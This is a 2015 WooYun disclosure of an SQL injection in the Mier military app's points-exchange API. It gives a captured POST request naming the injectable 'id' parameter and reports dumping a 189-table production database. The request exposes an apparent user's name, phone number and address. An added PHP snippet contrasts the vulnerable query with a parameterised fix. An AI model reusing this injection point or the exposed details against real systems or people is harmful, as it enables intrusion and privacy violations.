Defect ID: WooYun-2015-0122365
Vulnerability title: High-risk SQL injection on a Mier (米尔网) sub-site (many tables)
Affected vendor: Mier (米尔网)
Author: DloveJ
Submitted: 2015-06-24 15:43
Disclosed: 2015-08-08 15:44
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: Vendor could not be reached, or vendor actively ignored the report
Tags:
2015-06-24: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-08-08: Vendor has actively ignored the vulnerability; details disclosed to the public
RT (as titled)
SQL injection at one point in the Mier Military app. The app and the site belong to the same vendor.
After logging in to the app, go to the points exchange function.
Capture the request at the moment you confirm the exchange:
POST /api/2.0.3/app_integral_exchange.php?plat=android&proct=mierapp&apiCode=1 HTTP/1.1
Content-Length: 235
Content-Type: application/x-www-form-urlencoded
Host: bbs.mier123.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip

uid=495505&id=81&count=1&name=%E5%88%98%E4%B8%9C&phone=15104869199&address=%E5%86%85%E8%92%99%E5%8F%A4%E5%8C%85%E5%A4%B4%E5%B8%82%E6%98%86%E9%83%BD%E4%BB%91%E5%8C%BA%E5%86%85%E8%92%99%E5%8F%A4%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&cat=0
The id parameter is injectable.
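As an added illustration (not code from the mier123 app, whose source is not part of this report), the pattern that makes an integer id parameter injectable, beside the hardened form; table and column names and the connection settings are hypothetical:

```php
<?php
// Added illustration, not the mier123 app's code. Table/column names and
// the connection settings are hypothetical.

// Vulnerable pattern: the POST value is spliced into the SQL text, so any
// non-numeric content in "id" becomes part of the statement instead of data.
function lookup_goods_vulnerable(mysqli $db, array $post): ?array
{
    $sql = "SELECT id, name, price FROM goods WHERE id = " . $post['id'];
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened pattern: validate the type first, then pass the value as a bound
// parameter. The value never enters the SQL text, so the statement's shape
// cannot change regardless of what the client sends.
function lookup_goods_safe(PDO $db, array $post): ?array
{
    $id = filter_var($post['id'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);   // reject rather than guess
        return null;
    }
    $stmt = $db->prepare('SELECT id, name, price FROM goods WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Real (not emulated) prepares so MySQL binds server-side. The account this
// API connects with should hold only the DML rights it needs on its own
// schema: an injection through an account that also has FILE or SUPER
// reaches far beyond one table.
function connect_app_db(): PDO
{
    $dsn = 'mysql:host=127.0.0.1;dbname=example_app;charset=utf8mb4';
    return new PDO($dsn, 'app_user', getenv('APP_DB_PASSWORD') ?: '', [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}
```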
Multiple databases are present.
Let's dump the 2015 database:
Database: mier_2015_data
[189 tables]
database management system users privileges
Vendor could not be reached, or vendor actively refused
Vulnerability Rank: 15 (WooYun rating)
Please give a high rank, thanks..